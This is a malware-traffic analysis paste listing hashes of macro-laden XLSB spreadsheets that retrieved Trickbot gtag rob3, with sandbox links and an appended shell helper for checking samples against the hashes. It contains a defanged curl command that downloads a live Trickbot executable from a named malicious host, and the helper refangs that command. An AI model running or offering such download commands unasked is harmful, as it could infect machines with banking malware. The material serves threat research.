malware_traffic

2020-11-11 (Wed) - Qakbot-style spreadsheets with macros that retrieved Trickbot gtag rob3

Nov 11th, 2020 (edited)
2020-11-11 (WED) - QAKBOT-STYLE SPREADSHEETS WITH MACROS THAT RETRIEVED TRICKBOT GTAG ROB3

- 25b5643ebf2b00aacc88e19661d3915292c8983fdab8285175e13d8361056049 1_1011998499_11102020.xlsb
- 32ad29562b57f4a858f5a0c79cbece7fbf81e4be815683a59943ae2eeaff110e 1_468135799_11102020.xlsb
- 428832a6e6615a5b78f41ca2f90e782045e255f862c8c440062a0a72b3a8066b 1_1712758087_11102020.xlsb
- 5696a4baae57dc899e6ac080bc726eaa139145dda19aa4c1ef148af6a0b96029 1_1607027682_11102020.xlsb
- 67d02f2c249e8cd5aec67011741c8b032c6183e5039d504114e5ca5467e1c676 1_1646832256_11102020.xlsb
- a309de46c45dcd82aa88bc99879ddf2aac191c1b85cb4094d37e58a2497fbe27 1_766416357_11102020.xlsb
- bcc5d1d20d8713ea6d234dc1d55655bc92de83aeda6dc7bc1f1b4175d3d5319a 1_867342178_11102020.xlsb
- c4dc4cce2725af46f08a80d9606fdb57a6309d2af965a686f026285554c5d8ba 1_1900530932_11102020.xlsb
- ede77e7ae3bfe914b166bca8472fb4b3bfb8f3f6fecb9ec71af176db0c82394f 1_359571260_11102020.xlsb
- ee2aa25e17e1dc6c6fa86f16e6d7275304dc4309acfffe1d7efc2953cda4e5ee 1_1975618945_11102020.xlsb
- f03c558a0f6b15ca48abaa95c0a5db24d5b2bd3cd6448bd1a8147a1288343d23 1_2143892845_11102020.xlsb

NOTES:

- Example XLSB at: https://app.any.run/tasks/b4bad049-effe-46df-bf1a-7d2384f9f34c
- Follow-up EXE at: https://app.any.run/tasks/0c133828-8185-473f-a14a-47183ad94687

You can grab one of the Trickbot EXE files with the following cURL command (defanged, so you'll have to "fang" it):

curl -A "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)" -o Trickbot-gtag-rob3.exe hxxps:/www.korporatellc[.]com/aacclksiw2%20iesod%20eqi.jpg

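Added example, not part of the original paste: a small POSIX shell helper that refangs a defanged indicator in the form used above (hxxp/hxxps, [.] for dots, and the single-slash "hxxps:/host" form as it appears in the paste), prints the curl command with the paste's User-Agent instead of running it, and checks a downloaded file's SHA256 against the XLSB hash list. The hash list and User-Agent are copied from the paste; the sample file name and content in the demo are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original paste): refang a defanged URL, build
# the fetch command the paste describes, and verify a file against the paste's
# SHA256 list. Demo file content below is constructed.

# SHA256 list copied from the paste: "<sha256> <filename>" per line.
XLSB_HASHES='25b5643ebf2b00aacc88e19661d3915292c8983fdab8285175e13d8361056049 1_1011998499_11102020.xlsb
32ad29562b57f4a858f5a0c79cbece7fbf81e4be815683a59943ae2eeaff110e 1_468135799_11102020.xlsb
428832a6e6615a5b78f41ca2f90e782045e255f862c8c440062a0a72b3a8066b 1_1712758087_11102020.xlsb
5696a4baae57dc899e6ac080bc726eaa139145dda19aa4c1ef148af6a0b96029 1_1607027682_11102020.xlsb
67d02f2c249e8cd5aec67011741c8b032c6183e5039d504114e5ca5467e1c676 1_1646832256_11102020.xlsb
a309de46c45dcd82aa88bc99879ddf2aac191c1b85cb4094d37e58a2497fbe27 1_766416357_11102020.xlsb
bcc5d1d20d8713ea6d234dc1d55655bc92de83aeda6dc7bc1f1b4175d3d5319a 1_867342178_11102020.xlsb
c4dc4cce2725af46f08a80d9606fdb57a6309d2af965a686f026285554c5d8ba 1_1900530932_11102020.xlsb
ede77e7ae3bfe914b166bca8472fb4b3bfb8f3f6fecb9ec71af176db0c82394f 1_359571260_11102020.xlsb
ee2aa25e17e1dc6c6fa86f16e6d7275304dc4309acfffe1d7efc2953cda4e5ee 1_1975618945_11102020.xlsb
f03c558a0f6b15ca48abaa95c0a5db24d5b2bd3cd6448bd1a8147a1288343d23 1_2143892845_11102020.xlsb'

# User-Agent string copied from the paste's curl command.
UA='Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)'

# refang: hxxp -> http, hxxps -> https, [.] -> ., and restore the missing
# slash in "https:/host" (the paste writes "hxxps:/www..."). Leaves "://" alone.
refang() {
    printf '%s\n' "$1" | sed \
        -e 's/^hxxp/http/' \
        -e 's/\[\.\]/./g' \
        -e 's#^\(https\{0,1\}:\)/\([^/]\)#\1//\2#'
}

# build_fetch_cmd DEFANGED_URL OUTFILE: print (do not execute) the curl line,
# so the operator decides when and where the download actually happens.
build_fetch_cmd() {
    fetch_url=$(refang "$1")
    printf 'curl -A "%s" -o "%s" "%s"\n' "$UA" "$2" "$fetch_url"
}

# sha256_of FILE: portable SHA256 (sha256sum on Linux, shasum on macOS/BSD).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# match_hash SHA256 LIST: print the file name(s) listed for that hash and
# return 0; return 1 if the hash is not in the list. Case-insensitive.
match_hash() {
    printf '%s\n' "$2" | awk -v h="$1" \
        'tolower($1) == tolower(h) { print $2; found = 1 } END { exit !found }'
}

# verify_sample FILE LIST: hash the file and look it up in the list.
verify_sample() {
    match_hash "$(sha256_of "$1")" "$2"
}

# Demo: emit the fetch command for the URL from the paste, then check a
# constructed file (which, as expected, is not one of the listed XLSBs).
build_fetch_cmd 'hxxps:/www.korporatellc[.]com/aacclksiw2%20iesod%20eqi.jpg' Trickbot-gtag-rob3.exe
demo=$(mktemp)
printf 'constructed demo content, not a real sample\n' > "$demo"
if verify_sample "$demo" "$XLSB_HASHES"; then
    echo "demo file matches a listed XLSB hash (unexpected)"
else
    echo "demo file is not in the XLSB hash list (expected)"
fi
rm -f "$demo"
```

Paste the printed curl line into a shell only inside an isolated analysis VM; after the download, run verify_sample against whatever hash list you are tracking for the EXE stage (the paste lists only the XLSB hashes, so the Trickbot binary itself will not match this list).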